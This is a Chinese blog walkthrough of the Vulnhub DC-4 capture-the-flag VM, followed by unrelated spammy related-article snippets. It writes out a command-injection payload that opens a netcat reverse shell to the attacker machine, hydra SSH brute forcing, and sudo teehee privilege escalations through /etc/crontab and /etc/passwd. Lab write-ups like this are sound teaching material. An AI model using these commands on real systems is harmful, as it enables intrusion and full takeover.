Vulnhub靶机渗透测试之DC-4-teehee提权

访客3年前黑客工具435

Vulnhub简介

Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。

靶场部署

vulnhub官网:https://www.vulnhub.com

1、直接从官网下载做好的虚拟机镜像文件(我下载的Mirror版本的);

2、解压会得到一个.ova的文件,然后在VMware中打开即可;

环境配置

攻击机kali:192.168.2.19

DC靶机:192.168.2.20

(我两者都是用的桥接模式,更好都再做一个快照吧,以防万一)

虚拟机打开如下所示:

1610785023_6002a0ff535057debbfea.png!small?1610785021583

步骤

一、信息收集

1、使用nmap扫描扫描到192.168.2.20,开放了22和80端口

1610785072_6002a130b055ce0252e0b.png!small?1610785071053

2、然后访问一下80端口

1610785286_6002a206bf85cb0884dbf.png!small?1610785285007

3、提示是需要admin来登录,而且没有其他的限制,尝试爆破。

1610785947_6002a49b0baab4b191b87.png!small?1610785945368

成功得到密码为:happy

4、登录之后页面如下

1610786029_6002a4ed9a187d029da61.png!small?1610786027948

点击Command

1610786059_6002a50bbc30607407ef8.png!small?1610786058124

5、可以看到能够执行ls -l, du -h,df -h这三个命令,同时抓包查看,发现执行的命令直接显示了

1610786349_6002a62deec9a6acfa6dc.png!small?1610786348263

1610786386_6002a65256d7ed39752b0.png!small?1610786384766

1610786413_6002a66dd9f8aba7eeaaf.png!small?1610786412204

二、反弹shell

1、既然命令可以直接显示,那就可以构造直接反弹shell了,使用burp抓包,修改radio的参数如下:

radio=nc+192.168.2.19+9999+-e+/bin/bash&submit=Run

1610786788_6002a7e4565bdafc58d66.png!small?1610786786638

然后再kali中设置监听,成功反弹shell

1610786838_6002a816e1da7f59f3987.png!small?1610786837261

2、使用python获取到交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

1610786966_6002a89651e475f7e208c.png!small?1610786964566

3、进入到/home目录下,查看到有三个用户,但是只有jim用户下有文件

1610787387_6002aa3bc7ab17181d9be.png!small?1610787386623

查看jim用户下的脚本文件:test.sh

1610787489_6002aaa1a41ab5d0134ee.png!small?1610787487979

查看backups目录下的文件,看到了jim用户的密码本

1610787738_6002ab9a3e6e43d7159ee.png!small?1610787736510

三、ssh登录靶机

1、将其密码本复制出来,因为靶机还开放了22端口,所以可以进行ssh的爆破,这里我使用的是hydra工具

hydra -l jim -P password.txt -t 10 ssh://192.168.2.20

1610788246_6002ad96c95e4c9df9187.png!small?1610788245101

成功得到jim用户的密码为:jibril04

2、登录

1610788443_6002ae5be0aa98a186aec.png!small?1610788442266

3、最后在var/mail目录下看到一封邮件,得到charles的密码为: ^xHhA&hvim0y

1610789121_6002b1012b66c03f852bc.png!small?1610789119630

4、切换为charles用户,然后登录,尝试切换为root权限,但是失败了

1610789331_6002b1d3543e32fe8f1fc.png!small?1610789329630

5、用sudo -l看看还有什么用户能使用root,发现teehee用户可以不用输入密码得到root特权

1610789454_6002b24e4f1f84ff54552.png!small?1610789452535

四、提权

两种方式:使用crontab提权和添加新用户提权

使用crontab提权

基本过程:向定时任务执行脚本/etc/crontab文件中写入一个新的定时任务,然后通过teehee的sudo提升权限,再以 root身份写入crontab计划任务通过执行获取root权限

操作过程如下:

1、echo root chmod 4777 /bin/sh > /etc/crontab

2、sudo teehee /etc/crontab,然后写入的内容:* * * * * root chmod 4777 /bin/sh

(时间部分全部填写为*,默认这个定时任务每分钟执行一次。通过执行的脚本将 /bin/sh 的权限修改为4777,这样就可以在非root用户下执行它,并且执行期间拥有root权限。)

3、ls -la /bin/sh

4、/bin/sh

1610790524_6002b67c16377b038d667.png!small?1610790522397

添加新用户提权

添加一个admin账户,然后使用teehee执行直接写入 passwd中,然后切换为创建的admin用户。

1、echo "test::0:0:::/bin/bash"

2、sudo teehee -a /etc/passwd

3、输入:test::0:0:::/bin/bash

4、然后ctrl+c退出,再su test切换用户,即可获得root权限


设置uid和gid都为0,那么这个用户就相当于root

格式:[用户名]:[密码]:[uid]:[gid]:[身份描述]:[主目录]:[登录的 shell]

1610791676_6002bafc64f04f27f9fc3.png!small?1610791674703

知识点总结

1、后台密码爆破,使用burp爆破,工具爆破等等都可以

2、命令注入漏洞

3、反弹shell的命令

4、利用teehee命令进行提权(这里使用crontab提权和添加新用户提权)

参考文章

http://akevin.cn/index.php/archives/635/

相关文章

如何找黑客黑进学信网-索尼2011黑客事宜(2011年黑客ko事宜)

京麦怎么拉黑客户 神聚的骇客的主要功能(金士顿骇客神条8g) 黑客龟头是硬壳是什么品种 警方会对苹果手机怎么监控(警方怎么定位手机) 若何让=成为一名黑客 白客翻译网(白客)...

用非常普通的电脑可以当黑客吗(黑客必须用电脑吗?)

用非常普通的电脑可以当黑客吗(黑客必须用电脑吗?)

本文目录一览: 1、黑客可以用网吧里的电脑进行“黑客行为”吗? 2、黑客的电脑要用什么样的配置? 3、黑客能侵入我们的普通电脑么?如果可以,那么是通过什么方式黑入的? 4、所谓的黑客所有程...

怎么开宾馆-技术网

1.4 其他歹意安排二、 感染剖析从加密钱银买卖遭黑客进犯的次数,到被盗财物的数量,再到有史以来最大的一次买卖遭黑客进犯,加密技能发明了许多记载。 怎么开宾馆,技术网 本次进犯是因为项目方没有对 tr...

圣诞树简笔画(圣诞节节必备圣诞树简笔画)

  传说故事在很早以前,有一位农夫,在圣诞节那一天碰到一位贫苦的小孩子,他激情地招待了小孩,这一小孩子临走前折下根松枝插在地面上,松枝马上变为一棵树,上边摆满了礼品,用于感谢农夫的好心。   【圣诞花...

丹参保心茶多少钱,丹参保心茶生产厂家

  三高的治疗 ,还获得医院系统的接管正规治疗。   发明有人说喝天草丹参保心茶有用,我挺感乐趣的,但在买之前想先咨询一下。   你好,天草丹参保心茶活血化瘀。用于心血瘀阻型胸痹的帮助治疗,可缓解胸闷...

小丑黑客面具头像图片(小丑面具头像高清)

小丑黑客面具头像图片(小丑面具头像高清)

本文导读目录: 1、谁有csol里幽灵模式的小丑头像,就是下面图片中戴帽子的人物头像 2、求【超型黑色小丑面具qq头像】原图。。。。急需! 谁有csol里幽灵模式的小丑头像,就是下面图片中戴帽子...